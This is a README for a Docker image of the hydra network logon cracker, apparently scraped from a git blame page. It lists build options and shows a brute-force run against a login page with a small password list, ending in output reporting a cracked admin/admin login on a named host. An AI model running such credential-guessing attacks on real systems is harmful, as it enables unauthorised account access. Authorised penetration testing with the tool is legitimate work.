2015-07-02 17:35:11 +02:00
|
|
|
hydra
|
|
|
|
=====
|
|
|
|
|
|
|
|
A very fast network logon cracker which support many different services.
|
2015-07-02 18:06:55 +02:00
|
|
|
|
|
|
|
- [x] openssl
|
|
|
|
- [x] idn
|
|
|
|
- [x] curses
|
|
|
|
- [x] pcre
|
|
|
|
- [x] Postgres
|
2015-07-02 18:15:55 +02:00
|
|
|
- [x] SVN
|
2015-07-02 18:06:55 +02:00
|
|
|
- [ ] firebird
|
|
|
|
- [x] MYSQL client
|
|
|
|
- [ ] AFP
|
|
|
|
- [ ] NCP
|
|
|
|
- [ ] SAP/R3
|
2015-07-02 18:15:55 +02:00
|
|
|
- [x] libssh
|
2015-07-02 18:06:55 +02:00
|
|
|
- [ ] Oracle
|
|
|
|
- [ ] GUI req's
|
2015-07-02 18:15:55 +02:00
|
|
|
- [x] Android specialities
|
|
|
|
- [x] secure compile option support in gcc
|
2015-07-02 18:32:11 +02:00
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
$ docker run --rm -it -v `pwd`:/work vimagick/hydra
|
|
|
|
|
|
|
|
>>> cat passwd.txt
|
|
|
|
123456
|
|
|
|
admin
|
|
|
|
...
|
|
|
|
|
|
|
|
>>> hydra -l admin -P passwd.txt -o hacked.txt http://www.target.com/login.php
|
|
|
|
[DATA] max 1 task per 1 server, overall 64 tasks, 3 login try (l:1/p:1), ~0 tries per task
|
|
|
|
[DATA] attacking service http-get on port 2812
|
2016-05-01 03:06:20 +02:00
|
|
|
[2812][http-get] host: ss.easypi.info login: admin password: admin
|
2015-07-02 18:32:11 +02:00
|
|
|
1 of 1 target successfully completed, 1 valid password found
|
|
|
|
|
|
|
|
>>> cat hacked.txt
|
2016-05-01 03:06:20 +02:00
|
|
|
[2812][http-get] host: ss.easypi.info login: admin password: admin
|
2015-07-02 18:32:11 +02:00
|
|
|
```
|